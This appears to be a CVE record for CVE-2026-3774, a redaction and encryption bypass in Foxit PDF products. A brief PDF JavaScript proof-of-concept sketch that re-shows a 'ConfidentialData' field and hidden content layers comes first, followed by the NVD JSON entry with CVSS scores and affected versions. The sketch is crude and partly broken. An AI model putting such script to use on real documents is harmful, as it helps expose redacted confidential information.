CVE-2026-3774

// PoC Concept for CVE-2026-3774: PDF JavaScript to bypass redaction/encryption // This script demonstrates how a PDF might attempt to reveal or alter content // during the print or redaction process. function triggerExploit() { // Check if the document is being printed or a specific action is occurring // In a real scenario, this would be bound to 'WillPrint' or 'DidPrint' // Attempt to modify a form field that should have been redacted var sensitiveField = this.getField("ConfidentialData"); if (sensitiveField) { // Restore data that might have been cleared visually sensitiveField.value = "Secret_Information_123"; sensitiveField.display = display.visible; } // Attempt to toggle an Optional Content Group (OCG) var ocgs = this.getOCGs(); if (ocgs && ocgs.length > 0) { // Make hidden layers visible again ocgs[0].state = true; } } // Bind to a dummy event for demonstration this.addScript("exploit", triggerExploit);

{"cve": {"id": "CVE-2026-3774", "sourceIdentifier": "14984358-7092-470d-8f34-ade47a7658a2", "published": "2026-04-01T02:16:02.287", "lastModified": "2026-04-10T01:36:58.587", "vulnStatus": "Analyzed", "cveTags": [], "descriptions": [{"lang": "en", "value": "The application allows PDF JavaScript and document/print actions (such as WillPrint/DidPrint) to update form fields, annotations, or optional content groups (OCGs) immediately before or after redaction, encryption, or printing. These script‑driven updates are not fully covered by the existing redaction, encryption, and printing logic, which, under specific document structures and user workflows, may cause a small amount of sensitive content to remain unremoved or unencrypted as expected, or result in printed output that slightly differs from what was reviewed on screen."}, {"lang": "es", "value": "La aplicación permite que JavaScript de PDF y las acciones de documento/impresión (como WillPrint/DidPrint) actualicen campos de formulario, anotaciones o grupos de contenido opcional (OCG) inmediatamente antes o después de la redacción, el cifrado o la impresión. Estas actualizaciones impulsadas por scripts no están completamente cubiertas por la lógica existente de redacción, cifrado e impresión, lo que, bajo estructuras de documento y flujos de trabajo de usuario específicos, puede hacer que una pequeña cantidad de contenido sensible permanezca sin eliminar o sin cifrar como se esperaba, o resultar en una salida impresa que difiera ligeramente de lo que se revisó en pantalla."}], "metrics": {"cvssMetricV31": [{"source": "14984358-7092-470d-8f34-ade47a7658a2", "type": "Secondary", "cvssData": {"version": "3.1", "vectorString": "CVSS:3.1/AV:L/AC:H/PR:N/UI:R/S:U/C:H/I:N/A:N", "baseScore": 4.7, "baseSeverity": "MEDIUM", "attackVector": "LOCAL", "attackComplexity": "HIGH", "privilegesRequired": "NONE", "userInteraction": "REQUIRED", "scope": "UNCHANGED", "confidentialityImpact": "HIGH", "integrityImpact": "NONE", "availabilityImpact": "NONE"}, "exploitabilityScore": 1.0, "impactScore": 3.6}, {"source": "[email protected]", "type": "Primary", "cvssData": {"version": "3.1", "vectorString": "CVSS:3.1/AV:N/AC:L/PR:N/UI:N/S:U/C:H/I:N/A:N", "baseScore": 7.5, "baseSeverity": "HIGH", "attackVector": "NETWORK", "attackComplexity": "LOW", "privilegesRequired": "NONE", "userInteraction": "NONE", "scope": "UNCHANGED", "confidentialityImpact": "HIGH", "integrityImpact": "NONE", "availabilityImpact": "NONE"}, "exploitabilityScore": 3.9, "impactScore": 3.6}]}, "weaknesses": [{"source": "14984358-7092-470d-8f34-ade47a7658a2", "type": "Secondary", "description": [{"lang": "en", "value": "CWE-200"}]}, {"source": "[email protected]", "type": "Primary", "description": [{"lang": "en", "value": "NVD-CWE-noinfo"}]}], "configurations": [{"operator": "AND", "nodes": [{"operator": "OR", "negate": false, "cpeMatch": [{"vulnerable": true, "criteria": "cpe:2.3:a:foxit:pdf_editor:*:*:*:*:*:*:*:*", "versionEndIncluding": "13.2.2.24014", "matchCriteriaId": "8E9FD877-062E-4AE4-B7D7-91E1CA8657DF"}, {"vulnerable": true, "criteria": "cpe:2.3:a:foxit:pdf_editor:*:*:*:*:*:*:*:*", "versionStartIncluding": "14.0.0.33046", "versionEndIncluding": "14.0.2.33402", "matchCriteriaId": "6B7281CC-97ED-4441-BB97-6C73E328B9AD"}, {"vulnerable": true, "criteria": "cpe:2.3:a:foxit:pdf_editor:*:*:*:*:*:*:*:*", "versionStartIncluding": "2023.1.0.15510", "versionEndIncluding": "2023.3.0.23028", "matchCriteriaId": "0C75FEE6-54F3-49C6-BAEA-A09D23BE5D64"}, {"vulnerable": true, "criteria": "cpe:2.3:a:foxit:pdf_editor:*:*:*:*:*:*:*:*", "versionStartIncluding": "2024.1.0.23997", "versionEndIncluding": "2024.4.1.27687", "matchCriteriaId": "2C06BC41-9831-4AE3-B10B-3FC313D01580"}, {"vulnerable": true, "criteria": "cpe:2.3:a:foxit:pdf_editor:*:*:*:*:*:*:*:*", "versionStartIncluding": "2025.1.0.27937", "versionEndIncluding": "2025.3.0.35737", "matchCriteriaId": "AD0AAFC0-5B9B-4A11-8967-4699792850F1"}, {"vulnerable": true, "criteria": "cpe:2.3:a:foxit:pdf_reader:*:*:*:*:*:*:*:*", "versionEndIncluding": "2025.3.0.35737", "matchCriteriaId": "1A7AD877-2AB4-4568-8109-5406D2259725"}]}, {"operator": "OR", "negate": false, "cpeMatch": [{"vulnerable": false, "criteria": "cpe:2.3:o:microsoft:windows:-:*:*:*:*:*:*:*", "matchCriteriaId": "A2572D17-1DE6-457B-99CC-64AFD54487EA"}]}]}], "references": [{"url": "https://www.foxit.com/support/security-bulletins.html", "source": "14984358-7092-470d-8f34-ade47a7658a2", "tags": ["Vendor Advisory"]}]}}